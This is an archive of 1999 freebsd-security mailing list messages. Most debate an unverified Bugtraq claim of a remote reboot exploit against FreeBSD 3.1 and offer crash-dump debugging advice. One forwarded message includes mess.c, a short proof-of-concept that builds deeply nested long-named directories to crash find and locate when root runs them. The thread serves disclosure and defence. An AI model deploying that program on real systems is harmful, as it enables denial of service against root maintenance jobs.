almost certainly over IP, that will cause FreeBSD-3.1 systems to reboot with no warnings. The second box this was demonstrated on today had no open services besides ircd, and was remote rebooted. (The first box had open services such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd as the culprit). If anyone can shed some light on this (really bad) issue, it'd be greatly appreciated, especially since I am(was) in the process of upgrading all of my boxes to 3.1. (3.1-REL). Regards, -jamie -- jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc. >Sr. Network Engr, Chicago, SoCal Data Centers In an interesting move Exodus Communications annouced today that they have replaced all of their backbone engineers with furby's ------- End of forwarded message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 14:29:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from ifi.uio.no (ifi.uio.no [129.240.64.2]) by hub.freebsd.org (Postfix) with ESMTP id 9225114DE7 for ; Tue, 4 May 1999 14:29:22 -0700 (PDT) (envelope-from des@ifi.uio.no) Received: from hrotti.ifi.uio.no (2602@hrotti.ifi.uio.no [129.240.64.15]) by ifi.uio.no (8.8.8/8.8.7/ifi0.2) with ESMTP id XAA08417 for ; Tue, 4 May 1999 23:29:21 +0200 (MET DST) Received: (from des@localhost) by hrotti.ifi.uio.no ; Tue, 4 May 1999 23:29:20 +0200 (MET DST) To: security@freebsd.org Subject: [Przemyslaw Frasunek ] Re: Buffer overflow in ftpd and locate bug From: Dag-Erling Smorgrav Date: 04 May 1999 23:29:17 +0200 Message-ID: Lines: 92 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ------- Start of forwarded message ------- Message-ID: <19990502183800.1113.qmail@venglin.gadaczka.org> Date: Sun, 2 May 1999 20:37:35 CEST Reply-To: Przemyslaw Frasunek From: Przemyslaw Frasunek Subject: Re: Buffer overflow in ftpd and locate bug 
To: BUGTRAQ@NETSPACE.ORG --Message-Boundary-25450 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Content-description: Mail message body > I had problem with locate from findutils-4.1.24.rpm from Redhat-5.1 > It segfaults if we have huge directory at incoming ftp which created > by exploits for ftpd realpath hole. My ftpd is patched. Those exploits > ,i think, should not afraid me, but if updatedb puts to locate database > that directory then locate segfaults. ( getline.c 104 row by gdb ) > I guess it can be used for running arbitrary commands if root runs locate. I've noticed a similar problem with /usr/bin/find on FreeBSD. By creating _very_ long and deep directory structure it's possible to segfault /usr/bin/find (it's also used in /etc/periodic scripts, which runs on root). Example: I'm creating a directory structure with 300 subdirectories, each 255 chars length (source in attachment, also it's possible to do it via ftpd, because it calls mkdir() and chdir()). lagoon:venglin:/tmp/jc> find example > /dev/null Segmentation fault (core dumped) Gdb shows, that functions puts() was overflowed, when it tried to print a very long path. Also other system tools (rm, ls) has big problems with such directory structures. -- * Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 * * Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF * --Message-Boundary-25450 Content-type: text/plain; charset=US-ASCII Content-disposition: inline Content-description: Attachment information. The following section of this message contains a file attachment prepared for transmission using the Internet MIME message format. If you are using Pegasus Mail, or any another MIME-compliant system, you should be able to save it or view it from within your mailer. If you cannot, please ask your system administrator for assistance. ---- File information ----------- File: mess.c Date: 2 May 1999, 19:01 Size: 748 bytes. 
Type: Text --Message-Boundary-25450 Content-type: Application/Octet-stream; name=mess.c; type=Text Content-disposition: attachment; filename="mess.c" #include #include #include #include #define DUMP 0x41 main(int argc, char *argv[]) { char buf[255]; int i = 0; if (argc < 3) { fprintf(stderr, "usage: %s \n", argv[0]); exit(1); } if(chdir(argv[1])) { fprintf(stderr, "error in chdir(): %s\n", strerror(errno)); exit(1); } memset(buf, DUMP, 255); for(i=0;i<(atoi(argv[2]))-1;i++) { if(mkdir(buf, (S_IRWXU | S_IRWXG | S_IRWXO))) { fprintf(stderr, "error in mkdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); } if(chdir(buf)) { fprintf(stderr, "error in chdir() after %d iterations: %s\n", i, strerror(errno)); exit(1); } } exit(0); } --Message-Boundary-25450-- ------- End of forwarded message ------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 15: 9:24 1999 Delivered-To: freebsd-security@freebsd.org Received: from mx01.iafrica.com.na (mx01.iafrica.com.na [196.31.227.173]) by hub.freebsd.org (Postfix) with ESMTP id AB14C15231; Tue, 4 May 1999 15:09:10 -0700 (PDT) (envelope-from tim@iafrica.com.na) Received: from dup15-whk.iafrica.com.na ([196.20.4.15] helo=aptiva) by mx01.iafrica.com.na with smtp (Exim 2.11 #1) id 10enN5-000Aij-00; Wed, 5 May 1999 00:09:00 +0200 Message-ID: <372F7025.7081@iafrica.com.na> Date: Wed, 05 May 1999 00:09:41 +0200 From: Tim Priebe Reply-To: tim@iafrica.com.na X-Mailer: Mozilla 3.01 (Win95; I) MIME-Version: 1.0 To: Greg Quinlan Cc: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) References: <005401be9932$60574860$380051c2@greg.qmpgmc.ac.uk> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I saw such behavior Sunday when trying to implement a new firewall. 
The system would repeatedly panic with a trap 12. This would happen immediatelly after the login prompt appeared after the previous panic. The system would be stable, if I removed the first ethernet cable, plug the cable back in, and a short while later it would start over again. It was late, and we had to get the system working again, so we restored to the previous system. I have some information logged for packets at the time. I will check this and try to reproduce after I finish the course I am on this week. Tim. Greg Quinlan wrote: > > This sounds so.. so very familiar!! > > I have been the target of exploits before...... > > The exact same thing I have been experiencing........but not for about 5 > days now! > > I'm not convinced its a pure exploit.. (i.e. a program specifically written > for the purpose) > > Greg > > -----Original Message----- > From: Karl Denninger > To: chris@calldei.com ; Jordan K. Hubbard > > Cc: Mike Smith ; Seth ; > freebsd-stable@FreeBSD.ORG ; > security@FreeBSD.ORG ; jamie@exodus.net > > Date: 04 May 1999 05:20 > Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd) > > >On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote: > >> On Mon, May 3, 1999, Jordan K. Hubbard wrote: > >> > > I have to say that Jamie really let us down by not running a raw > >> > > tcpdump alongside the second targetted machine here. Any chance of > >> > > provoking these people into "demonstrating" the exploit on a machine, > >> > > while another connected to the same wire is running > >> > > >> > I'd say he or whomever first reported this to bugtraq let us down even > >> > more by releasing an "advisory" in such an unknown and unverifyable > >> > state. By doing so, all they've done is hand ammunition to the FUD > >> > corps and given us no reasonable chance to respond since the advisory > >> > >> I get the impression that that was the whole point of the > >> bugtraq post, to give us more grief. > > > >Ding! > > > >Give that man a cigar. 
> > > >Anyone who saw this done to one machine and didn't *immediately* configure > >machine #2 to trap and trace on the second instance deserves raspberries - > >at a minimum. > > > >Its one thing to have it done "anyonmously" (among other things you might > >not be there when it goes "boom" under those conditions!) Its another to > >have it done under controlled conditions and neither get an explanantion > >OR trap the condition that caused it yourself with a tcpdump trace. > > > >-- > >-- > >Karl Denninger (karl@denninger.net) Web: fathers.denninger.net > >I ain't even *authorized* to speak for anyone other than myself, so give > >up now on trying to associate my words with any particular organization. > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 4 15:13:53 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id ECBB414CE9 for ; Tue, 4 May 1999 15:13:50 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id PAA19927; Tue, 4 May 1999 15:13:41 -0700 (PDT) (envelope-from dillon) Date: Tue, 4 May 1999 15:13:41 -0700 (PDT) From: Matthew Dillon Message-Id: <199905042213.PAA19927@apollo.backplane.com> To: Dag-Erling Smorgrav Cc: Jamie Rishaw , security@FreeBSD.ORG Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Jamie. Well, I'm afraid you haven't given us much to go on. 
If there is indeed an exploit, we probably won't be able to find it until someone catches the panic message that caused the reboot or is otherwise able to supply more information. There are a number of ways to do this.

You can compile up a kernel configured to drop into DDB on panic rather than to simply reboot. Then, from the DDB prompt, you can issue a 'trace' command to get a stack trace and from there we can figure out the cause of the panic.

Another solution is to compile up a kernel configured with the console on a serial port. You then connect the serial port to another machine and log all the console messages. Using a serial console also allows you to remotely manage the machine fairly easily.

It may also be possible to generate a crash dump. This does not require a kernel recompile. The system must have at least as much swap space as main memory and /var/crash must have enough space to fit the entire dump (at least as much space as there is main memory, plus a tad more). You then enable dumps by specifying the dump device in /etc/rc.conf. If dumps are enabled, there is a good chance that the panic will be able to generate a crash dump before it reboots the machine.

For example, if the swap partition is /dev/sd0b, you would enable dumps by placing 'dumpdev="/dev/sd0b"' in /etc/rc.conf and then either rebooting, or running the 'dumpon /dev/sd0b' command manually. If you get a crash dump, you can then use gdb to get a stack backtrace to determine what caused the dump (if you get that far, ask for help and people can give you more detailed instructions). Always be extremely careful when enabling dumps: you do not want to accidentally dump on a non-swap partition!
-Matt
Matthew Dillon

:------- Start of forwarded message -------
:Message-ID: <19990501031840.A24252@dilbert.exodus.net>
:Date: Sat, 1 May 1999 03:18:40 -0500
:Reply-To: jamie@exodus.net
:From: Jamie Rishaw
:Subject: FreeBSD 3.1 remote reboot exploit
:To: BUGTRAQ@NETSPACE.ORG
:
:Hi,
:
: Sorry to be so vague, but I wanted to let everyone know,
:
: It's been demonstrated to me by two people who will not reveal "how"
:that there is a remote bug exploit, almost certainly over IP, that will
:cause FreeBSD-3.1 systems to reboot with no warnings.
:
: The second box this was demonstrated on today had no open services
:besides ircd, and was remote rebooted. (The first box had open services
:such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd
:as the culprit).
:
: If anyone can shed some light on this (really bad) issue, it'd be
:greatly appreciated, especially since I am(was) in the process of
:upgrading all of my boxes to 3.1. (3.1-REL).
:
: Regards,
:
:-jamie
:--
:jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc.
:>Sr. Network Engr, Chicago, SoCal Data Centers
: In an interesting move Exodus Communications announced today that
: they have replaced all of their backbone engineers with furbys
:
:------- End of forwarded message -------

From owner-freebsd-security Tue May 4 15:33:32 1999
Date: Wed, 5 May 1999 00:32:13 +0200 (CEST)
From: "Michael C. Vergallen"
To: Tim Priebe
Cc: Greg Quinlan , freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
In-Reply-To: <372F7025.7081@iafrica.com.na>

I don't see how this can be an exploit if you have /etc/hosts.deny and /etc/hosts.allow set up correctly and don't allow rcmd commands on your system. I tried to remotely reboot my ftp server here and no, it does not work on that machine, and I also tried on my gateway machine and no luck there either.
Now I will try my print server, but I first have to upgrade that box to 3.1... However, on my network I see more and more people scanning with a portscanner, so I suppose I'd better keep a lookout for strange items in my log files.

Michael
---
Michael C. Vergallen A.k.A. Mad Mike, Sportstraat 28, B 9000 Gent, Belgium
http://www.double-barrel.be/mvergall/
ftp://ftp.double-barrel.be/pub/linux/
tel : 32-9-2227764 Fax : 32-9-2224976

On Wed, 5 May 1999, Tim Priebe wrote:
> I saw such behavior Sunday when trying to implement a new firewall. The
> system would repeatedly panic with a trap 12. This would happen
> immediately after the login prompt appeared after the previous panic.
> The system would be stable, if I removed the first ethernet cable, plug
> the cable back in, and a short while later it would start over again.
> It was late, and we had to get the system working again, so we restored
> to the previous system. I have some information logged for packets at
> the time. I will check this and try to reproduce after I finish the
> course I am on this week.
>
> Tim.
>
> Greg Quinlan wrote:
> >
> > This sounds so.. so very familiar!!
> >
> > I have been the target of exploits before......
> >
> > The exact same thing I have been experiencing........but not for about 5
> > days now!
> >
> > I'm not convinced it's a pure exploit.. (i.e. a program specifically written
> > for the purpose)
> >
> > Greg
> >
> > -----Original Message-----
> > From: Karl Denninger
> > To: chris@calldei.com ; Jordan K. Hubbard
> > Cc: Mike Smith ; Seth ; freebsd-stable@FreeBSD.ORG ; security@FreeBSD.ORG ; jamie@exodus.net
> > Date: 04 May 1999 05:20
> > Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
> >
> > >On Mon, May 03, 1999 at 10:51:32PM -0500, Chris Costello wrote:
> > >> On Mon, May 3, 1999, Jordan K. Hubbard wrote:
> > >> > > I have to say that Jamie really let us down by not running a raw
> > >> > > tcpdump alongside the second targeted machine here. Any chance of
> > >> > > provoking these people into "demonstrating" the exploit on a machine,
> > >> > > while another connected to the same wire is running
> > >> >
> > >> > I'd say he or whomever first reported this to bugtraq let us down even
> > >> > more by releasing an "advisory" in such an unknown and unverifiable
> > >> > state. By doing so, all they've done is hand ammunition to the FUD
> > >> > corps and given us no reasonable chance to respond since the advisory
> > >>
> > >> I get the impression that that was the whole point of the
> > >> bugtraq post, to give us more grief.
> > >
> > >Ding!
> > >
> > >Give that man a cigar.
> > >
> > >Anyone who saw this done to one machine and didn't *immediately* configure
> > >machine #2 to trap and trace on the second instance deserves raspberries -
> > >at a minimum.
> > >
> > >It's one thing to have it done "anonymously" (among other things you might
> > >not be there when it goes "boom" under those conditions!) It's another to
> > >have it done under controlled conditions and neither get an explanation
> > >OR trap the condition that caused it yourself with a tcpdump trace.
> > >
> > >--
> > >--
> > >Karl Denninger (karl@denninger.net) Web: fathers.denninger.net
> > >I ain't even *authorized* to speak for anyone other than myself, so give
> > >up now on trying to associate my words with any particular organization.

From owner-freebsd-security Tue May 4 15:56:27 1999
Message-ID: <372F7B24.E352AEFF@tdnet.com.br>
Date: Tue, 04 May 1999 19:56:36 -0300
From: Unknow User
X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386)
To: Warner Losh
Cc: security@FreeBSD.ORG
Subject: Re: Security advisories
References: <372E4911.3A384379@tdnet.com.br> <199905042049.OAA04590@harmony.village.org>

Warner Losh wrote:
>
> In message <372E4911.3A384379@tdnet.com.br> Gustavo V G C Rios writes:
> : Where can I get Security advisories for FreeBSD 2.2.8-Stable ?
> : http://www.freebsd.org/security/#adv is too old!
> : The last one is 08/98. FreeBSD is a very secure OS, or nobody knows its
> : bugs, what's the truth ?
> : How can I keep myself up to date with security under FreeBSD ?
>
> I don't think there have been any security advisories since then.
> There have been a number of fixes that might impact security, but none
> of them have been severe enough to issue an advisory.
>
> Warner

Thanks a lot! You really helped me, but where can I get such fixes? Is there any central site?

Another problem: when a user deletes a file, the OS only removes its inode. Is there any util that writes 1/0 to the hard disk blocks? And about memory, is there any util that fills memory with 1/0?

Thanks a lot!

From owner-freebsd-security Tue May 4 16:02:44 1999
To: Dag-Erling Smorgrav
Cc: security@FreeBSD.ORG
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
In-reply-to: Your message of "04 May 1999 23:22:44 +0200."
Date: Tue, 04 May 1999 16:02:13 -0700
Message-ID: <7739.925858933@zippy.cdrom.com>
From: "Jordan K. Hubbard"

Please don't forward this kinda stuff - we've all already seen it and, as we've also pointed out numerous times, it says absolutely nothing.
- Jordan

> ------- Start of forwarded message -------
> Message-ID: <19990501031840.A24252@dilbert.exodus.net>
> Date: Sat, 1 May 1999 03:18:40 -0500
> Reply-To: jamie@exodus.net
> From: Jamie Rishaw
> Subject: FreeBSD 3.1 remote reboot exploit
> To: BUGTRAQ@NETSPACE.ORG
>
> Hi,
>
> Sorry to be so vague, but I wanted to let everyone know,
>
> It's been demonstrated to me by two people who will not reveal "how"
> that there is a remote bug exploit, almost certainly over IP, that will
> cause FreeBSD-3.1 systems to reboot with no warnings.
>
> The second box this was demonstrated on today had no open services
> besides ircd, and was remote rebooted. (The first box had open services
> such as smtp, ssh, pop, http, but did /not/ run ircd, eliminating ircd
> as the culprit).
>
> If anyone can shed some light on this (really bad) issue, it'd be
> greatly appreciated, especially since I am(was) in the process of
> upgrading all of my boxes to 3.1. (3.1-REL).
>
> Regards,
>
> -jamie
> --
> jamie rishaw (efnet:gavroche) -- Exodus Communications, Inc.
> >Sr. Network Engr, Chicago, SoCal Data Centers
> In an interesting move Exodus Communications announced today that
> they have replaced all of their backbone engineers with furbys
>
> ------- End of forwarded message -------

From owner-freebsd-security Tue May 4 16:08:03 1999
Date: Tue, 4 May 1999 16:07:50 -0700 (PDT)
From: Matthew Dillon
Message-Id: <199905042307.QAA20315@apollo.backplane.com>
To: "Jordan K. Hubbard"
Cc: Dag-Erling Smorgrav , security@FreeBSD.ORG
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
References: <7739.925858933@zippy.cdrom.com>

:Please don't forward this kinda stuff - we've all already seen it
:and, as we've also pointed out numerous times, it says absolutely
:nothing.
:
:- Jordan

Maybe so, but if he is who his signature says he is, he deserves a professional answer that might (hopefully) prompt him to educate himself.
-Matt
Matthew Dillon

From owner-freebsd-security Tue May 4 16:32:16 1999
To: Matthew Dillon
Cc: Dag-Erling Smorgrav , security@FreeBSD.ORG
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
In-reply-to: Your message of "Tue, 04 May 1999 16:07:50 PDT." <199905042307.QAA20315@apollo.backplane.com>
Date: Tue, 04 May 1999 16:31:42 -0700
Message-ID: <7965.925860702@zippy.cdrom.com>
From: "Jordan K. Hubbard"

> Maybe so, but if he is who his signature says he is, he deserves
> a professional answer that might (hopefully) prompt him to
> educate himself.

As far as I've been able to tell, he went straight underground after posting his "advisory" and isn't particularly in the mood for an education.

- Jordan

From owner-freebsd-security Tue May 4 16:40:44 1999
Message-ID: <005401be9688$3cbcaff0$4e00000a@compton.cnmnetwork.com>
Reply-To: "Jacob Zehnder"
From: "Jacob Zehnder"
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
Date: Tue, 4 May 1999 16:45:49 -0700
X-Mailer: Microsoft Outlook Express 4.72.3612.1700

I agree with Jordan, this advisory says ABSOLUTELY nothing. When you post such warnings with no proof it makes one think that the person who posts is more interested in fame. If indeed this is a real problem, ask the people who compromised your machine to contact the developers of FreeBSD and nip the problem in the bud. "The sky is falling, the sky is falling" comes to mind..

--jacob

Jacob Zehnder
Network Engineer
CNMNetwork http://www.cnmnetwork.com

-----Original Message-----
From: Jordan K. Hubbard
To: Matthew Dillon
Cc: Dag-Erling Smorgrav ; security@FreeBSD.ORG
Date: Tuesday, May 04, 1999 4:33 PM
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit

>> Maybe so, but if he is who his signature says he is, he deserves
>> a professional answer that might (hopefully) prompt him to
>> educate himself.
> >As far as I've been able to tell, he went straight underground after
> >posting his "advisory" and isn't particularly in the mood for an
> >education.
> >
> >- Jordan

From owner-freebsd-security Tue May 4 16:51:20 1999
From: "Humberto Saback"
Date: Tue, 4 May 1999 20:51:04 -0300
Message-ID: <003b01be9688$f9b8a960$e657dfc8@marvin.atarde.com.br>

subscribe

======================
A TARDE OnLine
Humberto Saback Júnior
Technical Coordinator
http://www.atarde.com.br

From owner-freebsd-security Tue May 4 17:03:48 1999
From: Don Lewis
Message-Id: <199905050003.RAA06539@salsa.gv.tsc.tdk.com>
Date: Tue, 4 May 1999 17:03:24 -0700
In-Reply-To: Warner Losh "Re: freebsd mbuf crash" (May 4, 3:03pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: Warner Losh , Darren Reed
Subject: Re: freebsd mbuf crash
Cc: freebsd-security@FreeBSD.ORG

On May 4, 3:03pm, Warner Losh wrote:
} Subject: Re: freebsd mbuf crash
} In message <199905041526.BAA29421@cheops.anu.edu.au> Darren Reed writes:
} : is this one (below) taken care of ? perhaps a derivative of this ?
}
} What's it supposed to do? I can't get it to cause any grief on my
} -current system, nor on the 3.1-stable based systems we have here at
} work.

I believe this was fixed by version 1.103 of sys/netinet/ip_input.c. This change was made shortly after 3.0-RELEASE.

The original exploit code only ran correctly on Linux (and nuked FreeBSD machines). It didn't do anything interesting when run under FreeBSD, because the byte order of various IP header fields sent on raw sockets differs between Linux and FreeBSD. This caused various sanity checks in the FreeBSD stack to toss the packet instead of sending it. If you tweak the byte order in the exploit code, you can get it to run under FreeBSD and crash vulnerable FreeBSD machines.
From owner-freebsd-security Tue May 4 17:19:32 1999
Date: Tue, 4 May 1999 17:18:56 -0700 (PDT)
From: Jorge Aldana
Reply-To: Jorge Aldana
To: Mike Uttech
Cc: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
In-Reply-To: <19990504210951.3781215C1E@hub.freebsd.org>

So, rebooting when a machine is overloaded is not a problem?

It seems (from the current and past questions to the security and questions mail lists) that something is going on with this. Just because we can't solve it doesn't mean it's not there; mysterious re-boots seem to be occurring at my site off and on. As soon as we up the debugging nothing happens (this alone changes a variable within the system), and, as with most sites and people I've talked to, we lack time for debugging and actually keeping the systems running. I have seen too many variables in determining what caused a system to crash, and repeating a case never has resulted in a reproduction of said problem.

It seems from the responses that this is an acceptable symptom of FreeBSD 3.1 (release and stable)?

From my logs, machines have stayed up since FreeBSD 3.1 Stable was installed (19990303) and others have rebooted the next day and all combinations in between (but none are consistent).

It may or may not help but that has been my experience.

Jorge

On Tue, 4 May 1999, Mike Uttech wrote:
> We used to have problems with one of our 3.1-RELEASE boxes randomly
> locking up with no logs of why. We decided to split the load off of the
> one machine and have not had a problem with it locking up since. If my
> memory serves me today, I remember reading about a problem in the
> 3.1-RELEASE distribution that under heavy load caused the system to hang or
> reboot. I personally feel that many of these people (the ones who are
> saying they have been having random reboots) are not being attacked in
> any way but rather are having their machines overloaded and rebooting.
>
> Mike
>
> At 03:53 PM 5/4/99 , Warner Losh wrote:
> >In message Vince Vielhaber writes:
> >: It's typically in bad taste to post it to BugTraq before contacting the
> >: vendor.
> >
> >I can say that no one appears to have contacted security-officer about
> >this. People have contacted us in the past saying that their machine
> >randomly reboots. When pressed for details, or to enable ddb or crash
> >dumps to see why the machine is rebooting, they disappear and nothing
> >further is heard from them.
> >
> >Warner

From owner-freebsd-security Tue May 4 19:57:57 1999
From: Darren Reed
Message-Id: <199905050257.MAA07852@cheops.anu.edu.au>
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
To: jkh@zippy.cdrom.com (Jordan K. Hubbard)
Date: Wed, 5 May 1999 12:57:12 +1000 (EST)
Cc: dillon@apollo.backplane.com, des@ifi.uio.no, security@FreeBSD.ORG
In-Reply-To: <7965.925860702@zippy.cdrom.com> from "Jordan K. Hubbard" at May 4, 99 04:31:42 pm
X-Mailer: ELM [version 2.4 PL23]

In some mail from Jordan K. Hubbard, sie said:
>
> > Maybe so, but if he is who his signature says he is, he deserves
> > a professional answer that might (hopefully) prompt him to
> > educate himself.
>
> As far as I've been able to tell, he went straight underground after
> posting his "advisory" and isn't particularly in the mood for an
> education.

So at this point, are you or one of the other FreeBSD people going to post a reply to bugtraq requesting more information and/or denying that it is a problem until it can be proved more conclusively?
Being on the cusp of a release & Usenix, this needs to be settled one way or another.

From owner-freebsd-security Tue May 4 20:01:06 1999
Date: Tue, 4 May 1999 23:00:44 -0400
From: Jared Mauch
To: Darren Reed
Cc: "Jordan K. Hubbard" , dillon@apollo.backplane.com, des@ifi.uio.no, security@FreeBSD.ORG
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
Message-ID: <19990504230044.A7490@puck.nether.net>
References: <7965.925860702@zippy.cdrom.com> <199905050257.MAA07852@cheops.anu.edu.au>
X-Mailer: Mutt 0.95.1i
In-Reply-To: <199905050257.MAA07852@cheops.anu.edu.au>; from Darren Reed on Wed, May 05, 1999 at 12:57:12PM +1000

He's in the process of moving from chi->la; he was packing up last week when I spoke with him.

- jared

On Wed, May 05, 1999 at 12:57:12PM +1000, Darren Reed wrote:
> In some mail from Jordan K. Hubbard, sie said:
> >
> > > Maybe so, but if he is who his signature says he is, he deserves
> > > a professional answer that might (hopefully) prompt him to
> > > educate himself.
> >
> > As far as I've been able to tell, he went straight underground after
> > posting his "advisory" and isn't particularly in the mood for an
> > education.
>
> So at this point, are you or one of the other freebsd people going to
> post a reply to bugtraq requesting more information and/or denying that
> it is a problem until it can be proved more conclusively ? Being on the
> cusp of a release & Usenix, this needs to be settled one way or another.

--
Jared Mauch | pgp key available via finger from jared@puck.nether.net
clue++; | http://puck.nether.net/~jared/ My statements are only mine.

From owner-freebsd-security Tue May 4 20:30:53 1999
Message-Id: <4.2.0.37.19990504212515.045d3100@localhost>
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Tue, 04 May 1999 21:29:41 -0600
To: "Jacob Zehnder" ,
From: Brett Glass
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
In-Reply-To: <005401be9688$3cbcaff0$4e00000a@compton.cnmnetwork.com>

What would be the motivation for FUDding FreeBSD in this way? I would not panic, but I would also ask for more information and would not dismiss the report out of hand. The tone of Jordan's message makes him look defensive rather than cautious and diligent.
--Brett

At 04:45 PM 5/4/99 -0700, Jacob Zehnder wrote:
>I agree with Jordan, this advisory says ABSOLUTELY nothing. When you post
>such warnings with no proof it makes one think that the person who posts is
>more interested in fame. If indeed this is a real problem, ask the people
>who compromised your machine to contact the developers of FreeBSD and nip
>the problem in the bud. "The sky is falling, the sky is falling" comes to
>mind..
>
>--jacob
>
>Jacob Zehnder
>Network Engineer
>CNMNetwork http://www.cnmnetwork.com
>
>-----Original Message-----
>From: Jordan K. Hubbard
>To: Matthew Dillon
>Cc: Dag-Erling Smorgrav ; security@FreeBSD.ORG
>Date: Tuesday, May 04, 1999 4:33 PM
>Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
>
> >> Maybe so, but if he is who his signature says he is, he deserves
> >> a professional answer that might (hopefully) prompt him to
> >> educate himself.
> >
> >As far as I've been able to tell, he went straight underground after
> >posting his "advisory" and isn't particularly in the mood for an
> >education.
> >
> >- Jordan

From owner-freebsd-security Tue May 4 20:39:28 1999
Message-Id: <4.2.0.37.19990504213441.045d6c50@localhost>
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.37 (Beta)
Date: Tue, 04 May 1999 21:37:59 -0600
To: Jorge Aldana , Mike Uttech
From: Brett Glass
Subject: Re: FreeBSD 3.1 remote reboot exploit (fwd)
Cc: freebsd-stable@FreeBSD.ORG, security@FreeBSD.ORG
References: <19990504210951.3781215C1E@hub.freebsd.org>

We had kernel panics resulting in spontaneous reboots in 2.2.7 when we removed the ATAPI_STATIC option. The swap partition was on an IDE drive, so we figured that the problem was VM-related. I sent information to a few lists sometime back, but I don't know if any of the core team members ever followed up. We haven't dared to remove that option since.

--Brett

At 05:18 PM 5/4/99 -0700, Jorge Aldana wrote:
>So, rebooting when a machine is overloaded is not a problem?
>
> It seems (from the current and past questions to the security and questions mail lists) that something is going on with this. Just because we can't solve it doesn't mean it's not there; mysterious re-boots seem to be occurring at my site off and on. As soon as we up the debugging nothing happens (this alone changes a variable within the system), and as most sites and people I've talked to, we lack time, for debugging and actually keeping the systems running. I have seen too many variables in determining what caused a system to crash, and repeating a case never has resulted in a reproduction of said problem.
>
> It seems from the responses that this is an acceptable symptom of FreeBSD 3.1 (release and stable)?
>
> From my logs, machines have stayed up since FreeBSD 3.1 Stable was installed (19990303) and others have rebooted the next day and all combinations in between (but none are consistent).
>
> It may or may not help but that has been my experience.
>
> Jorge
>
> On Tue, 4 May 1999, Mike Uttech wrote:
>
> > We used to have problems with one of our 3.1-RELEASE boxes randomly locking up with no logs of why. We decided to split the load off of the one machine and have not had a problem with it locking up since. If my memory serves me today, I remember reading about a problem in the 3.1-RELEASE distribution that under heavy load caused the system to hang or reboot. I personally feel that many of these people (the ones who are saying they have been having random reboots) are not being attacked in any way but rather are having their machines overloaded and rebooting.
> >
> > Mike
> >
> > At 03:53 PM 5/4/99, Warner Losh wrote:
> > > In message Vince Vielhaber writes:
> > > : It's typically in bad taste to post it to BugTraq before contacting the vendor.
> > >
> > > I can say that no one appears to have contacted security-officer about this. People have contacted us in the past saying that their machine randomly reboots.
> > > When pressed for details, or to enable ddb or crash dumps to see why the machine is rebooting, they disappear and nothing further is heard from them.
> > >
> > > Warner

From owner-freebsd-security Tue May 4 21:02:21 1999
Date: Tue, 4 May 1999 23:53:38 -0400 (EDT)
From: Snob Art Genre
To: Darren Reed
Cc: "Jordan K. Hubbard", dillon@apollo.backplane.com, des@ifi.uio.no, security@FreeBSD.ORG
Subject: Re: [Jamie Rishaw ] FreeBSD 3.1 remote reboot exploit
In-Reply-To: <199905050257.MAA07852@cheops.anu.edu.au>

On Wed, 5 May 1999, Darren Reed wrote:
> So at this point, are you or one of the other freebsd people going to post a reply to bugtraq requesting more information and/or denying that it is a problem until it can be proved more conclusively? Being on the cusp of a release & Usenix, this needs to be settled one way or another.
If the fellow's moving, as someone posted, then there won't likely be any responses forthcoming from him just yet, and he has been mailed privately -- but it seems to me that a followup post from someone official-ish might be good for PR reasons.

Ben @narcissus.net -- finally

From owner-freebsd-security Tue May 4 21:35:49 1999
